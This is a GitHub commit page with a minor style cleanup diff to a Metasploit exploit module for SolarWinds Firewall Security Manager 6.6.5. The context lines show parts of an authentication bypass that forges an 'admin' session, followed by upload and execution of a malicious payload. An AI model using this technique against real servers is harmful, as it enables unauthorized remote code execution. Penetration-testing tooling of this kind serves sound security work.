Skip to content

Commit 7c9b19c

Browse files
committed
Do minor cleanup
1 parent 0b14a18 commit 7c9b19c

File tree

1 file changed

+7
-7
lines changed

1 file changed

+7
-7
lines changed

modules/exploits/windows/http/solarwinds_fsm_userlogin.rb

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -54,12 +54,12 @@ def initialize(info={})
5454
['Solarwinds Firewall Security Manager 6.6.5', {}]
5555
],
5656
'Privileged' => false,
57-
'DisclosureDate' => "Mar 13 2015",
57+
'DisclosureDate' => 'Mar 13 2015',
5858
'DefaultTarget' => 0))
5959

6060
register_options(
6161
[
62-
OptString.new('TARGETURI', [ true, "Base FMS directory path", '/'])
62+
OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
6363
], self.class)
6464
end
6565

@@ -86,7 +86,7 @@ def exploit
8686
# 'admin' is there by default and you can't delete it
8787
username = 'admin'
8888
print_status("Auth bypass: Putting session value: username=#{username}")
89-
sid = put_session_value('admin')
89+
sid = put_session_value(username)
9090
print_status("Your SID is: #{sid}")
9191

9292
# Stage 2 of the attack
@@ -185,13 +185,13 @@ def upload_exec(sid, filename, malicious_file)
185185

186186
if !res
187187
fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
188-
elsif res && res.body.include?('java.lang.NoClassDefFoundError')
189-
print_status("Payload being treated as XLS, indicates a successful upload.")
188+
elsif res.body.include?('java.lang.NoClassDefFoundError')
189+
print_status('Payload being treated as XLS, indicates a successful upload.')
190190
else
191-
print_status("Unsure of a successful upload.")
191+
print_status('Unsure of a successful upload.')
192192
end
193193

194-
print_status("Attempting to execute the payload.")
194+
print_status('Attempting to execute the payload.')
195195
exec_file(sid, filename)
196196
end
197197

0 commit comments

Comments
 (0)